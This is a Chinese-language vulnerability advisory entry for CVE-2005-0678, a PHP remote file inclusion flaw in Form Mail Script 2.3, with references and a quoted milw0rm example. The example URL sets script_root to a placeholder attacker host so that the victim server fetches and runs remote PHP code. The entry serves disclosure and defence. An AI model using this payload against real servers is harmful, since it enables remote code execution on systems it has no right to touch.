Form Mail Script PHP远程文件包含漏洞

Form Mail Script PHP远程文件包含漏洞

漏洞ID 1108501 漏洞类型 未知
发布时间 2005-03-05 更新时间 2005-05-02
图片[1]-Form Mail Script PHP远程文件包含漏洞-安全小百科CVE编号 CVE-2005-0678
图片[2]-Form Mail Script PHP远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200505-657
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/857
https://www.securityfocus.com/bid/90198
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-657
|漏洞详情
用于FormMailScript2.3及更早版本的formmail.inc.php存在PHP远程文件包含漏洞,远程攻击者可以通过修改script_root来引用一个远程web服务器上含有该代码的URL,从而执行任意PHP代码。
|漏洞EXP
Example:

 if register_globals=on and allow_url_fopen=on:
   http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/

# milw0rm.com [2005-03-05]
|受影响的产品
Stadtaus Form Mail Script 2.3
|参考资料

来源:www.stadtaus.com
链接:http://www.stadtaus.com/forum/t-1579.html
来源:SECUNIA
名称:14505
链接:http://secunia.com/advisories/14505
来源:SECTRACK
名称:1013378
链接:http://securitytracker.com/id?1013378
来源:BUGTRAQ
名称:20050304PHPFormMailScript(2.3)-ArbitraryFileInclusion(VXSfx)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110996489800035&w;=2

相关推荐: LICQ格式字符串漏洞

LICQ格式字符串漏洞 漏洞ID 1202155 漏洞类型 格式化字符串 发布时间 2003-12-31 更新时间 2003-12-31 CVE编号 CVE-2003-0363 CNNVD-ID CNNVD-200312-330 漏洞平台 N/A CVSS评分…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享